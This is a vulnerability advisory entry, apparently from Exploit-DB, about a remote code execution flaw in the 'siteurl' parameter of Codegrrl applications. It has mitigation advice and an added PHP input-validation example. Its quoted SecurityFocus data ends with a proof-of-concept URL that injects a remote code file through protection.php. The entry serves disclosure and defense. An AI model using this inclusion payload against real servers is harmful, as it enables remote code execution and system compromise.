Vendor: Unspecified Codegrrl applications
By:
CVSS: 7.5 (HIGH)
CWE: Remote Code Execution
Product Name: Unspecified Codegrrl applications
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Unspecified Codegrrl applications remote arbitrary code execution vulnerability

The vulnerability is caused by a lack of proper sanitization of user-supplied input in the 'siteurl' parameter. An attacker can exploit this by supplying malicious code as input in that parameter, which allows the attacker to execute arbitrary code in the context of the Web server process, potentially leading to a compromise of the system.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization mechanisms. Additionally, it is advised to restrict access to the affected application and regularly update to the latest version that addresses this issue.
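
One way to apply the input validation recommended above to the 'siteurl' parameter, as an added example that is not Codegrrl code or part of the original advisory. The function name, the host allowlist and the sample inputs are hypothetical, and it assumes 'siteurl' is only ever meant to name the installation's own base URL.

```php
<?php
// Added example, not Codegrrl code. Assumption: 'siteurl' should only ever
// name this installation's own base URL, so anything else is rejected.

// Hypothetical allowlist of hosts this installation is served from.
const ALLOWED_SITE_HOSTS = ['www.example.com', 'example.com'];

/** Return a normalized URL if $raw is http(s) on an allowlisted host, else null. */
function validated_siteurl($raw): ?string
{
    // Reject arrays (siteurl[]=...), empty or oversized input, and any
    // whitespace or control characters.
    if (!is_string($raw) || $raw === '' || strlen($raw) > 2048
        || preg_match('/[\x00-\x20\x7f]/', $raw)) {
        return null;
    }
    $parts = parse_url($raw);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    // Only plain web schemes are accepted; every other scheme is dropped.
    $scheme = strtolower($parts['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') {
        return null;
    }
    // Embedded credentials can disguise the real host, so refuse them.
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;
    }
    // Exact, case-insensitive host match; no suffix or substring matching.
    $host = strtolower($parts['host']);
    if (!in_array($host, ALLOWED_SITE_HOSTS, true)) {
        return null;
    }
    // Rebuild from the validated pieces; port, query and fragment are dropped.
    return $scheme . '://' . $host . ($parts['path'] ?? '/');
}

// Constructed sample inputs (not taken from real traffic).
$samples = [
    'http://www.example.com/',
    'http://other-host.invalid/code.txt',
    'ftp://www.example.com/',
    'http://www.example.com@other-host.invalid/',
];
foreach ($samples as $s) {
    printf("%-44s %s\n", $s, validated_siteurl($s) ?? 'REJECTED');
}
```

Only the first sample is accepted; a request handler would stop processing when the function returns null and treat an accepted value strictly as data.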
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15417/info

Unspecified Codegrrl applications are prone to a remote arbitrary code execution vulnerability. This is due to a lack of proper sanitization of user-supplied input.

An attacker can exploit this to execute arbitrary code in the context of the Web server process. This may facilitate a compromise of the system; other attacks are also possible. 

http://www.example.com/protection.php?action=logout&siteurl=http://www.example.com/malicoius-code.txt